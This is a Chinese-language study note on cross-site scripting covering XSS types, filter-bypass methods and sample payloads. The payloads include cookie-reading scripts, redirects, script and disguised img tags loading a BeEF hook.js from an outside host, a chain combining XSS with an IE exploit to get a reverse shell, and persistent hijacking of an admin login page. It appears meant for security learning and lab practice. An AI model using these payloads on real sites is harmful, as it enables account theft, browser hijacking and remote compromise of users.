原理
未对用户提交的数据(嵌入的恶意js代码)进行过滤处理,使用户被动访问黑客服务器并传输cookie。造成盗取账户、页面挂马、非法转账等危害。特性:不是对服务器的攻击,是对客户端浏览器的攻击,即前端攻击。浏览即中招,又叫做页面挂马。
分类
反射型XSS:常见于搜索框处,将恶意脚本执行后形成的链接制作成超链接并诱导用户点击。 存于URL中。条件:server有漏洞、用户点击。
存储型XSS:常见于留言板处,攻击隐蔽性更强,只要用户浏览被插马页面,即可神不知鬼不觉地中招。 存于DB中。
DOM型XSS:存于client中。
绕过方式
绕过magic_quotes_gpc 利用Hackbug的String.fromCharCode转码
改变大小写
url编码、Base64编码、HEX编码
闭合标签
手工攻击
#常用HTML标签 <iframe src= <iframe>、<img>、<script>
#常用JavaScript方法
alert() 弹窗
window.location() 重定向
location.href() 重定向
onload() 加载完成
onsubmit() 点击完成
onerror() 加载时报错
#构造XSS脚本:
弹框警告:<script>alert('xss')</script>
<script>alert(document.cookie)</script>
页面嵌套:<iframe src=http://www.sohu.com width=300 height=300></iframe>
页面重定向:<script>location.href="http://www.sohu.com"</script>
弹窗警告并重定向:
访问恶意代码:<script src="http://beef-ip:3000/hook.js"></script>
因script标签太敏感故巧用图片标签进行伪装:
<img src="http://beef-ip:3000/hook.js"></img>
#存储型XSS漏洞手工利用流程
建立黑客服务器(Apache服务、php脚本)——将xss恶意脚本植入web服务器——等待用户访问恶意页面触发传送cookie——cookie利用。XSS攻击利用案例
#BeEF
可以做什么:信息收集、持久化控制、社工。
BeEF_web后台管理 online/offline 绿/橙/灰/红
Commands菜单:Browser、Debug、Exploits、Metasploit、Misc、Persistence、
SocialEngineering等漏洞利用模块。
#webxss.cn平台(貌似已失效)
#xss漏洞+ms10-002漏洞(IE6)的getshell过程
xss劫持浏览器,恶意代码 <script>src=http://ip:port/hook.js</script>
msf配置反弹shell侦听端口,生成恶意链接
beef使劫持的浏览器访问恶意链接
msf接收反弹shell
#xss漏洞+ms12-024漏洞(IE789)的getshell过程(略)
#永久劫持web管理员cookie(获取webshell之后)
将</textarea>'"><script src=恶意URL></script>写入web管理员登录页面
漏洞利用工具:
BeEF:kali内置。下载地址:https://beefproject.com/
https://xssye.com/auth/login
https://xss.yt/
XSSer:自动化XSS漏洞检测及利用工具。参考文档:https://www.freebuf.com/sectool/173228.html
靶场练习参照:
https://cloud.tencent.com/developer/article/1665021
https://www.freebuf.com/articles/web/338123.html